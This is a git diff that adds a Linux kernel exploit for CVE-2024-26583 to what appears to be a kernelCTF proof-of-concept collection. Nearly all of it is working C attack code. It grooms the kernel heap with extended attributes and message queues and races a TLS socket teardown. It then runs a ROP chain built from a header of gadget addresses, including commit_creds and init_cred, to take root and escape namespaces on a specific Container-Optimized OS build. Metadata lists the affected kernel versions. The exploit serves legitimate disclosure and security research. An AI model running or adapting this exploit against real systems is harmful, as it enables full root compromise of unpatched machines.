+#define XATTR_MAX_CHUNK 3000 +#define XATTR_IDX(base, offset) (base*XATTR_MAX_CHUNK + offset) + + +void create_watches(int fd) +{ + for (int i=0; itv_nsec += usecs * 1000; + + if (ts->tv_nsec >= NSEC_PER_SEC) { + ts->tv_sec++; + ts->tv_nsec -= NSEC_PER_SEC; + } +} + + +char *g_stack1; +char *g_stack2; + +struct child_arg { + int tfd; + int sock; + int try; +}; + +int child_recv(void *arg) +{ + struct itimerspec its = { 0 }; + struct child_arg *carg = (struct child_arg *) arg; + + + + set_cpu(1); + eventfd_t event_value; + eventfd_read(g_event2, &event_value); +// printf("child pid: %d sock: %d\n", getpid(), carg->sock); + + int delay = g_delay; + + if (!delay) { + delay = 40 + (rand() % 5); + } + + ts_add(&its.it_value, delay); + + printf("delay: %d attempt: %d\n", delay, carg->try); + eventfd_write(g_event1, 1); + + timerfd_settime(carg->tfd, 0, &its, NULL); + set_cpu_all(); + + char recv_buf[256]; + memset(recv_buf, 'A', sizeof(recv_buf)); + int ret = recv(carg->sock, recv_buf, 10, MSG_DONTWAIT); + + + if (ret < 0) + perror("recv"); + + sleep(1000); + + return 0; +} + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ + +void setup_tls(int sock, int is_rx) +{ + if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) + err(1, "setsockopt"); + + static struct tls12_crypto_info_aes_ccm_128 crypto_info = {.info.version = TLS_1_2_VERSION, .info.cipher_type = TLS_CIPHER_AES_CCM_128}; + + if (setsockopt(sock, SOL_TLS, is_rx ? TLS_RX : TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); +} + +int sender(void *a) +{ + int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + struct sockaddr_in addr; + memset(&addr, 0, sizeof(addr)); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (connect(sock, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + + setup_tls(sock, 0); + + char buf[256]; + memset(buf, 'B', sizeof(buf)); + int ret = send(sock, buf, 100, 0); + sleep(2000); + exit(0); +} + +key_serial_t alloc_key(int id, size_t len, char *buf) +{ + key_serial_t serial; + char desc[256]; + len -= 24; + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "user", desc, buf, len, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "key add"); + } + + return serial; +} + +key_serial_t alloc_keyring(int id) +{ + key_serial_t serial; + char desc[256]; + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "keyring", desc, NULL, 0, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "keyring add"); + } + + return serial; +} + + +void prefault_heap() +{ + static char buf[16000]; + int fd = open("/proc/self/maps", 0); + if (fd < 0) + err(1, "open maps"); + + read(fd, buf, sizeof(buf)); + + char *s = buf; + while (1) + { + char *h = strstr(s, "[heap]"); + + if (!h) + break; + + + *h = '\0'; + char *str1 = strrchr(s, '\n') + 1; + char *str_end; + + s = h + 1; + + unsigned long start = strtol(str1, &str_end, 16); + unsigned long end = strtol(str_end+1, NULL, 16); + for (unsigned long addr = start; addr < end; addr += 0x1000) + { + volatile char *p = (char *) addr; + volatile char b = *p; + *p = b; + } + } + +} +unsigned int parse_buddyinfo(char *buf, unsigned int order, unsigned int *total, unsigned int order_filter, unsigned int *all_table) +{ + char *t = strstr(buf, "Normal"); + + char *num = strtok(t, " "); + + unsigned int result = 0; + + if (total) + *total = 0; + + for (int i = 0; i <= 10; i++) + { + unsigned int num = atoi(strtok(NULL, " ")); + unsigned int p = pow(2, i); + + if (total) { + *total += num * p; + } + + if (all_table) + all_table[i] = num; + + if (!order_filter && i == order) + result = num; + else if (order_filter && i <= order_filter) + result += num * p; + } + + return result; + +} + +unsigned int parse_zoneinfo(char *buf, unsigned int *high, unsigned int *batch) +{ + char *t; + + t = strstr(buf, "zone Normal"); + t = strstr(t, "cpu: 0"); + t = strstr(t, "count: "); + + + unsigned int cnt = atoi(t+7); + + if (high) { + t = strstr(t, "high: "); + *high = atoi(t+6); + } + + if (batch) { + t = strstr(t, "batch: "); + *batch = atoi(t+7); + } + + return cnt; + +} + +void xfrm_add_sa_pfkey_compress(unsigned int id, int delete) +{ +#define SA_ADDR_SIZE 3 + + size_t msg_len = sizeof(struct sadb_msg) + SA_ADDR_SIZE*8*2 + sizeof(struct sadb_sa); + + struct sadb_msg *msg = calloc(1, msg_len); + if (!msg) { + perror("calloc"); + exit(1); + } + + msg->sadb_msg_version = PF_KEY_V2; + + if (delete) + msg->sadb_msg_type = SADB_DELETE; + else + msg->sadb_msg_type = SADB_ADD; + msg->sadb_msg_satype = SADB_X_SATYPE_IPCOMP; + msg->sadb_msg_len = msg_len / 8; + + struct sadb_address *src = (struct sadb_address *) (msg+1); + + src->sadb_address_len = SA_ADDR_SIZE; + src->sadb_address_exttype = SADB_EXT_ADDRESS_SRC; + src->sadb_address_prefixlen = 8; + + struct sockaddr_in *srcaddr = (struct sockaddr_in *) (src+1); + srcaddr->sin_family = AF_INET; + if (id == 2) + inet_pton(AF_INET, "127.0.0.1", &srcaddr->sin_addr); + else + srcaddr->sin_addr.s_addr = id; + + + struct sadb_address *dst = (struct sadb_address *) (srcaddr+1); + dst->sadb_address_len = SA_ADDR_SIZE; + dst->sadb_address_exttype = SADB_EXT_ADDRESS_DST; + dst->sadb_address_prefixlen = 8; + + struct sockaddr_in *dstaddr = (struct sockaddr_in *) (dst+1); + dstaddr->sin_family = AF_INET; + if (id == 2) + inet_pton(AF_INET, "127.0.0.1", &dstaddr->sin_addr); + else + dstaddr->sin_addr.s_addr = id; + + struct sadb_sa *sa = (struct sadb_sa *) (dstaddr+1); + sa->sadb_sa_len = 2; + sa->sadb_sa_exttype = SADB_EXT_SA; + sa->sadb_sa_encrypt = SADB_X_CALG_DEFLATE; + sa->sadb_sa_spi = id; + + struct msghdr hdr; + memset(&hdr, 0, sizeof(hdr)); + + struct iovec iov[1]; + iov[0].iov_base = msg; + iov[0].iov_len = msg_len; + + hdr.msg_iov = iov; + hdr.msg_iovlen = 1; + + int ret = sendmsg(g_sock_key, &hdr, 0); + + free(msg); + + if (ret < 0) + err(1, "sendmsg pfkey add\n"); + +} + +char * read_buddyinfo() +{ + static char zibuf[10000]; + static int fdzi = -1; + + if (fdzi < 0) { + fdzi = open("/proc/buddyinfo", 0, O_DIRECT); + if (fdzi < 0) + err(1, "open buddyinfo"); + } + + lseek(fdzi, SEEK_SET, 0); + read(fdzi, zibuf, sizeof(zibuf)); + + return zibuf; +} + +unsigned int get_zone_count(unsigned int order, unsigned int *total) +{ + return parse_buddyinfo(read_buddyinfo(), order, total, 0, NULL); +} + +unsigned int get_zone_counts(unsigned int *table) +{ + return parse_buddyinfo(read_buddyinfo(), 0, NULL, 0, table); +} + +unsigned int get_zone_count_filter(unsigned int order, unsigned int *total, unsigned order_filter) +{ + return parse_buddyinfo(read_buddyinfo(), order, total, order_filter, NULL); +} + +unsigned int get_pagecount(unsigned int *high, unsigned int *batch) +{ + static char zibuf[10000]; + static int fdzi = -1; + + if (fdzi < 0) { + fdzi = open("/proc/zoneinfo", 0, O_DIRECT); + if (fdzi < 0) + err(1, "open zoneinfo"); + } + + lseek(fdzi, SEEK_SET, 0); + read(fdzi, zibuf, sizeof(zibuf)); + + return parse_zoneinfo(zibuf, high, batch); +} + +#define MAX_QIDS 32000 +static int all_qids[32000]; +static int qid = -1; +static int all_qids_idx = 0; +static size_t msg_allocated = 0; +int alloc_msg(size_t len, char *buf, long id) +{ + long *msg; + char *our_buf = g_mmapped_buf; + + assert(len > 48); + + len -= 48; + + if (qid < 0 || msg_allocated + len > 16000) { + if (all_qids_idx >= (MAX_QIDS - 1)) + errx(1, "Exceeded max queues limit"); + + qid = all_qids[all_qids_idx++]; + msg_allocated = 0; + } + + msg = (long *) our_buf; + + *msg = id + 1; +// memcpy(msg+1, buf, len); + + if (msgsnd(qid, msg, len, IPC_NOWAIT)) + err(1, "msgsnd"); + + msg_allocated += len; + + return qid; +} + + +// clear order 1 pcp list +int flush_pcp(int xattr_fd) +{ + unsigned int pcp_high, pcp_batch, pcp_count; + unsigned int pcp_prev = get_pagecount(&pcp_high, &pcp_batch); + unsigned int flushed = 0; + + unsigned int flush_cnt = 12; + for (int i = 0; i < PCPFLUSH2_CNT; i++) + { + free_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH2, i)); + + + unsigned int pcp_count = get_pagecount(&pcp_high, &pcp_batch); + + if (pcp_count < pcp_prev) { + if (++flushed >= flush_cnt) + break; + } + + pcp_prev = pcp_count; + } + + + if (flushed < flush_cnt) { + printf("Unable to do enough pcp flushes\n"); + return -1; + } + + return 0; + +} + +int prepare_kmalloc32(int xattr_fd) +{ + prefault_heap(); + int pcnt1 = get_pagecount(NULL, NULL); + unsigned detected = 0; + + + for (int i = 0; i < KMALLOC32_CNT; i++) + { + alloc_xattr_fd2(xattr_fd, XATTR_IDX(KMALLOC32, i), 32, 32, g_mmapped_buf); + int pcnt2 = get_pagecount(NULL, NULL); + + if ((pcnt2 - pcnt1) == -1 || (pcnt2-pcnt1) == 30) { + detected = 1; + break; + } + + pcnt1 = pcnt2; + } + + if (!detected) { + printf("Unable to detect kmalloc-32 slab\n"); + return -1; + } + + + return 0; +} + +void prepare_pcp(int xattr_fd, int *msgs) +{ + char *m1 = mmap(NULL, 0x80000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (m1 == MAP_FAILED) + err(1, "mmap 0x80000"); + + unsigned int zone_count; + + unsigned int zone_counts[11]; + + get_zone_counts(zone_counts); + + for (int i = 0; i < ORDER1_CNT; i++) + { + int zc0 = zone_counts[0]; + int zc1 = zone_counts[1]; + + msgs[i] = alloc_msg(256, g_mmapped_buf, i); + get_zone_counts(zone_counts); + + if (zone_counts[1] < zc1) { + break; + } + } + + for (int i = 0; i < ORDER0_CNT; i++) + { + msgs[20000+i] = alloc_msg(256, g_mmapped_buf, 20000 + i); + } + + + unsigned int pcp_high, pcp_batch; + unsigned int pcp_count = get_pagecount(&pcp_high, &pcp_batch); + unsigned int pcp_prev = pcp_count; + int batch = pcp_batch; + unsigned int detected = 0; + + pcp_count = get_pagecount(&pcp_high, &pcp_batch); + + unsigned int to_free = pcp_high - pcp_count - 6; + for (int i = 0; i < PCPFLUSH_CNT; i++) + { + if (to_free < 8) + break; + free_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH, i)); + pcp_count = get_pagecount(&pcp_high, &pcp_batch); + to_free = pcp_high - pcp_count - 1; + } + if (to_free > 0) + munmap(m1, to_free*0x1000); + +} + +int find_order1(int xattr_fd) +{ + int cnt1, cnt2; + int total1, total2; + + cnt1 = get_zone_count(1, &total1); + + unsigned int detected = 0; + + char buf[32]; + memset(buf, 'B', sizeof(buf)); + + int i; + for (i = 0; i < KMALLOC32_SLAB_CNT*30; i++) + { + alloc_xattr_fd2(xattr_fd, i, 32, 32, buf); + cnt2 = get_zone_count(1, &total2); + + if (total2 < total1) { + detected = 1; + break; + } + } + + if (!detected) { + printf("Unable to detect new final page!\n"); + return -1; + } + + return 0; +} + +void setup_xfrm_policy(int sock, int spi) +{ + int res; + + struct xfrm_userpolicy_info *policy = calloc(sizeof(struct xfrm_userpolicy_info) + sizeof(struct xfrm_user_tmpl), 1); + policy->action = XFRM_POLICY_ALLOW; + policy->sel.family = AF_INET; + policy->dir = XFRM_POLICY_OUT; + + struct xfrm_user_tmpl *tmpl = (struct xfrm_user_tmpl *) (policy + 1); + + tmpl->id.proto = IPPROTO_COMP; + tmpl->id.spi = spi; + + res = setsockopt(sock, SOL_IP, IP_XFRM_POLICY, policy, sizeof(*policy) + sizeof(struct xfrm_user_tmpl)); + + if (res < 0) { + perror("setsockopt policy"); + exit(1); + } +} + +int create_xfrm_socket(int spi) +{ + int res; + + int sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); + + if (sock < 0) { + perror("socket2"); + exit(1); + } + + + struct sockaddr_in addr = { + .sin_family = AF_INET + }; + + inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr); + + res = connect(sock, (struct sockaddr *) &addr, sizeof(addr)); + + if (res < 0) { + perror("connect"); + exit(1); + } + + + setup_xfrm_policy(sock, spi); + + return sock; + +} + +void stage2(int xattr_fd, int xattr_fd2) +{ + usleep(100000); + + printf("Stage2 started\n"); + + xfrm_add_sa_pfkey_compress(2, 0); + xfrm_add_sa_pfkey_compress(1, 1); + + usleep(200000); + + char attr[256]; + memset(attr, 0, sizeof(attr)); + + uint64_t g1 = kaddr(PUSH_RSI_JMP_QWORD_RSI_0F); + + for (int i = 0; i < 200; i++) + { + snprintf(attr, sizeof(attr), "security.a%06d", i); + for (int j = 16; j < 184; j += 8) + { + uint64_t *p = (uint64_t *) (attr + j); + *p = g1; + } + alloc_xattr_fd_attr(xattr_fd2, attr, 193, g_mmapped_buf); + } + + + g_rop2_len = prepare_rop2((uint64_t *) g_rop2); + if (g_rop2_len > ROP2_CONST_OFFSET) + err(1, "Stage 2 ROP size too big: %d > %d\n", g_rop2_len, ROP2_CONST_OFFSET); + + prepare_rop(g_mmapped_buf); + + int ret = send(g_sock_xfrm, g_mmapped_buf, 1000, 0); + if (ret < 0) + perror("send"); + + xfrm_add_sa_pfkey_compress(2, 1); +} + +void prepare_queues() +{ + int key = 0x1234; + for (int i = 0; i < MAX_QIDS; i++) + { + all_qids[i] = msgget(key + i, IPC_CREAT | 0600); + + if (all_qids[i] < 0) + err(1, "msgget"); + } + all_qids_idx = 0; + qid = -1; + msg_allocated = 0; +} + + +int one_attempt(int tfd, int tfd2) +{ + static unsigned int try = 0; + int success = 0; + + char fname[512]; + char fname2[512]; + + snprintf(fname, sizeof(fname), "/tmp/y_%d", try); + int xattr_fd = open(fname, O_RDWR|O_CREAT); + if (xattr_fd < 0) + err(1, "xattr open\n"); + snprintf(fname2, sizeof(fname2), "/tmp/a_%d", try); + int xattr_fd2 = open(fname2, O_RDWR|O_CREAT); + if (xattr_fd2 < 0) + err(1, "xattr open\n"); + + int tfd3 = timerfd_create(CLOCK_MONOTONIC, 0); + + int sock_serv = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + + if (sock_serv < 0) + err(1, "socket"); + + int flag = 1; + setsockopt(sock_serv, SOL_SOCKET, SO_REUSEADDR, &flag, sizeof(flag)); + + struct sockaddr_in addr, peer_addr; + memset(&addr, 0, sizeof(addr)); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (bind(sock_serv, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + listen(sock_serv, 99999); + + + pid_t sender_pid = clone(sender, g_stack2 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, NULL); + + if (sender_pid < 0) + err(1, "clone sender"); + + + socklen_t sz = sizeof(peer_addr); + int sock = accept(sock_serv, &peer_addr, &sz); + + if (sock < 0) + err(1, "accept"); + + set_cpu(0); + +#define BIG_SIZE 0x80000 + + if (!g_bigbuf) { + g_bigbuf = mmap(NULL, BIG_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (g_bigbuf == MAP_FAILED) + err(1, "mmap g_bigbuf"); + + allocate_twsock_slab(); + } + + prepare_queues(); + + struct child_arg carg = { + .tfd = tfd, + .sock = sock, + .try = try + }; + + pid_t pid = clone(child_recv, g_stack1 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, (void *) &carg); + + for (int i = 0; i < PARTIAL1_CNT; i++) + { + alloc_xattr_fd(xattr_fd, XATTR_IDX(PARTIAL1, i), 257, g_mmapped_buf); + } + + + for (int i = 0; i < PCPFLUSH_CNT; i++) + { + alloc_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH, i), 16*1024+32, g_bigbuf); + } + for (int i = 0; i < PCPFLUSH2_CNT; i++) + { + alloc_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH2, i), 16*1024+32, g_bigbuf); + } + + + + + unsigned int pcnt1, pcnt2; + + unsigned int slabs_detected = 0; + unsigned int slabs_to_skip = 1; + + g_before2_cnt = SLAB_CNT*(slabs_to_skip+10); + for (int i = 0; i < g_before2_cnt; i++) + { + pcnt1 = get_pagecount(NULL, NULL); + + alloc_xattr_fd(xattr_fd, XATTR_IDX(BEFORE2, i), 257, g_mmapped_buf); + + pcnt2 = get_pagecount(NULL, NULL); + if (pcnt1 - pcnt2 == 2) { + slabs_detected++; + + if (slabs_detected == slabs_to_skip) + break; + } + } + + int do_exit = 0; + if (slabs_detected < slabs_to_skip) { + printf("Not enough new slabs detected!\n"); + do_exit = 1; + + goto nexttry; + } + + for (int i = 0; i < BEFORE3_CNT; i++) + { + alloc_xattr_fd(xattr_fd, XATTR_IDX(BEFORE3, i), 257, g_mmapped_buf); + } + +// At this point we have current slab almost full, last slot will be allocated by tls main context +// rx context and crypto tfm will be allocated from the new slab + + setup_tls(sock, 1); + + for (int i = 0; i < NEIGH_CNT; i++) + { + alloc_xattr_fd(xattr_fd, XATTR_IDX(NEIGHBOUR, i), 257, g_mmapped_buf); + } + + + for (int i = 0; i < AFTER_CNT; i++) + { + alloc_xattr_fd(xattr_fd, XATTR_IDX(AFTER, i), 257, g_mmapped_buf); + } + + if (prepare_kmalloc32(xattr_fd) < 0) + goto nexttry; + + if (flush_pcp(xattr_fd) < 0) + goto nexttry; + + static int msgs2[30000]; + prepare_pcp(xattr_fd, msgs2); + + + for (int i = 0; i < NEIGH_CNT; i++) + { + free_xattr_fd(xattr_fd, XATTR_IDX(NEIGHBOUR, i)); + } + + for (int i = 0; i < PARTIAL1_CNT/SLAB_CNT - 3; i++) + { + free_xattr_fd(xattr_fd, XATTR_IDX(PARTIAL1, i*SLAB_CNT)); + } + + + printf("Preparations ok, attempting to race ...\n"); + + struct itimerspec its = { 0 }; + + + eventfd_write(g_event2, 1); + + eventfd_t event_value; + eventfd_read(g_event1, &event_value); + + ts_add(&its.it_value, g_delay+1000); + + timerfd_settime(tfd3, 0, &its, NULL); + + uint64_t v1; + read(tfd3, &v1, sizeof(v1)); + + close(sock); + + usleep(100); + + for (int i = PARTIAL1_CNT/SLAB_CNT - 3; i < PARTIAL1_CNT/SLAB_CNT; i++) + { + free_xattr_fd(xattr_fd, XATTR_IDX(PARTIAL1, i*SLAB_CNT)); + } + +// Trigger pcp flush + free_xattr_fd(xattr_fd, XATTR_IDX(PCPFLUSH, PCPFLUSH_CNT-1)); + + if (find_order1(xattr_fd2) < 0) + goto nexttry; + + xfrm_add_sa_pfkey_compress(1, 0); + + stage2(xattr_fd, xattr_fd2); + + + +nexttry: + set_cpu(0); + + for (int i = 0; i < MAX_QIDS; i++) + { + if (msgctl(all_qids[i], IPC_RMID, NULL) < 0) + err(1, "msgctl"); + } + + + close(sock_serv); + close(tfd3); + close(xattr_fd); + unlink(fname); + close(xattr_fd2); + unlink(fname2); + + kill(sender_pid, 9); + kill(pid, 9); + + int status; + + if (waitpid(pid, &status, 0) < 0) + err(1, "waitpid"); + + if (waitpid(sender_pid, &status, 0) < 0) + err(1, "waitpid"); + + if (do_exit) + exit(0); + try++; + usleep(300000); + + return success; + +} + +int main2(int argc, char **argv) +{ + int ret; + g_mmapped_buf = mmap(NULL, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0); + if (g_mmapped_buf == MAP_FAILED) { + perror("mmap"); + return 1; + } + + memset(g_mmapped_buf, 0, MMAP_SIZE); + + struct timeval time; + gettimeofday(&time,NULL); + + srand((time.tv_sec * 1000) + (time.tv_usec / 1000)); + + + set_cpu(0); + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", + .salg_name = "cryptd(ctr(aes-generic))" + }; + int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0); + + if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + + + struct sockaddr_alg sa2 = { + .salg_family = AF_ALG, + .salg_type = "aead", + .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))" + }; + + if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + + sleep(1.5); + + g_stack1 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + g_stack2 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + if (g_stack1 == MAP_FAILED || g_stack2 == MAP_FAILED) { + perror("mmap stack"); + exit(1); + + } + +#define ROP2_MMAP_SIZE 0x4000 + g_rop2 = mmap(NULL, ROP2_MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0); + if (g_rop2 == MAP_FAILED) + err(1, "mmap"); + + + + int tfd = timerfd_create(CLOCK_MONOTONIC, 0); + int tfd2 = timerfd_create(CLOCK_MONOTONIC, 0); + + g_sock_key = socket(AF_KEY, SOCK_RAW, 2);; + + if (g_sock_key == -1) + err(1, "socket key"); + +#define ROP2_MMAP_SIZE 0x4000 + g_rop2 = mmap(NULL, ROP2_MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0); + if (g_rop2 == MAP_FAILED) + err(1, "mmap"); + + create_watches(tfd); + + g_event1 = eventfd(0, 0); + g_event2 = eventfd(0, 0); + + printf("parent pid: %d\n", getpid()); + + set_cpu(0); + + + mlockall(MCL_CURRENT); + g_sock_xfrm = create_xfrm_socket(2); + + for (int i = 0; i < MAX_ATTEMPTS; i++) + { + if (one_attempt(tfd, tfd2)) + break; + + } + + return 0; +} + +int main(int argc, char **argv) +{ + int status; + int attempt; + + + printf("Using default kernel base, your chance is 1/512, good luck!\nTry providing leaked kernel base as argv[1]\n"); + + g_kernel_text = 0xffffffff81000000uL; + + struct rlimit rlim; + rlim.rlim_cur = rlim.rlim_max = 4096; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) + err(1, "setrlimit()"); + + setbuf(stdout, NULL); + + setup_namespaces(); + setup_network("lo"); + + sleep(2); + + for (int i = 0; i < MAX_ATTEMPTS2; i++) + { + pid_t pid = fork(); + if (!pid) + return main2(argc, argv); + waitpid(pid, &status, 0); + } +} + diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/kernelver_17412.226.68.h b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/kernelver_17412.226.68.h new file mode 100644 index 000000000..0e9534a8e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/kernelver_17412.226.68.h @@ -0,0 +1,24 @@ +#define COPY_USER_GENERIC_STRING 0xffffffff817d41b0 +#define PUSH_RDI_JMP_QWORD_RSI_0F 0xffffffff81c5f168 +#define FIND_TASK_BY_VPID 0xffffffff81104580 +#define POP_RCX 0xffffffff810287cc +#define INIT_CRED 0xffffffff83462140 +#define PUSH_RSI_JMP_QWORD_RSI_0F 0xffffffff81c696b5 +#define POP_RSI_RDX_RCX 0xffffffff810287ca +#define INIT_NSPROXY 0xffffffff83461f00 +#define SWITCH_TASK_NAMESPACES 0xffffffff8110bd30 +#define PUSH_RAX_JMP_QWORD_RCX 0xffffffff813dad92 +#define POP_RDI_RSI_RDX_RCX 0xffffffff810287c9 +#define POP_RSI_RDI 0xffffffff8196e521 +#define POP_RDX_RDI 0xffffffff817bfadb +#define AUDIT_SYSCALL_EXIT 0xffffffff811b1c60 +#define RETURN_VIA_SYSRET 0xffffffff822001cf +#define MEMCPY 0xffffffff81ff5e30 +#define COMMIT_CREDS 0xffffffff8110d710 +#define POP_RSI 0xffffffff81fc28f9 +#define POP_RSP 0xffffffff81105ceb +#define POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX 0xffffffff810287c1 +#define POP_RDI 0xffffffff810d03ac +#define POP_RDX 0xffffffff810643dd +#define RW_BUFFER 0xffffffff83500000 +#define G1 0x diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/metadata.json b/pocs/linux/kernelctf/CVE-2024-26583_cos/metadata.json new file mode 100644 index 000000000..1f5362d6d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp128" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d", + "cve": "CVE-2024-26583", + "affected_versions": [ + "4.20 - 5.15.159", + "4.20 - 6.1.78" + ], + "requirements": { + "attack_surface": [ + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_TLS" + ] + } + }, + "exploits": { + "cos-105-17412.226.68": { + "uses": [ + ], + "requires_separate_kaslr_leak": true, + "stability_notes": "10% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-26583_cos/original.tar.gz new file mode 100644 index 000000000..31cd84596 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_cos/original.tar.gz differ